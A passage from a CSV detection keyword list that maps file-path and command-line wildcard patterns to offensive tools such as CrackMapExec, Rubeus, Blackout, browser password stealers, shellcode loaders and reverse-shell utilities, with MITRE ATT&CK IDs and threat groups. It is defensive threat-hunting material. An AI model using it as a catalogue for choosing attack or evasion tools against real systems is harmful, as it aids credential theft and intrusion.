- CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*\BeaconChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*\BeaconConnector.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*\BesoToken.cpp*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*\BesoToken.exe*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*\BesoToken.vcxproj*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*\bh_owned.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\bin\cme.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\bin\shepard\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*\BitTorrent.exe*","greyware_tool_keyword","bittorent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]bittorrent.com/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*\Blackout.exe*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*\Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*\Blackout.sys*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*\Blackout.sys*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"*\Blackout.vcxproj*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*\blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*\BloodHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*\BloodHoundGui\*.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*\BloodHound-win32-X64*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*\bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*\brc.zip*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*\BrowserEnum.log*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*\bypassuac.txt*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*\C2concealer*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"*\certipy.pfx*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*\charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*\charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*\chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*\Chimera-main\*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*\chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*\chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"*\Chrome_pass.db*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*\chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*\CIMplant.exe*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*\CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*\cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*\cme.exe* -d * -u * -H *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\cme.exe* -d * -u * -p *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\cme.exe* --shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\codeloader.exe*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","0","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" +"*\Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*\combine.exe*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*\combine_gui.exe*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*\COM-Hunter.csproj*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*\COM-Hunter.exe*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*\COM-Hunter.sln*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*\common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\Cooolis-ms-Loader\*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*\crackmapexecwin*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*\cradle.ps1*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*\Crassus-main*","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","10","6","503","55","2023-09-29T20:02:02Z","2023-01-12T21:01:52Z" +"*\creditcards.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*\CredsPhish.log*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\CrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*\CROSSNET\CROSSNET\*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","0","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" +"*\cryptolok*","offensive_tool_keyword","Github Username","redteam tools github repo ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/cryptolok","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\curlshell-main*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*\CurrentVersion\Uninstall\FreeFileSync_is1*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\CustomEncoding.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*\D1rkInject\*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense 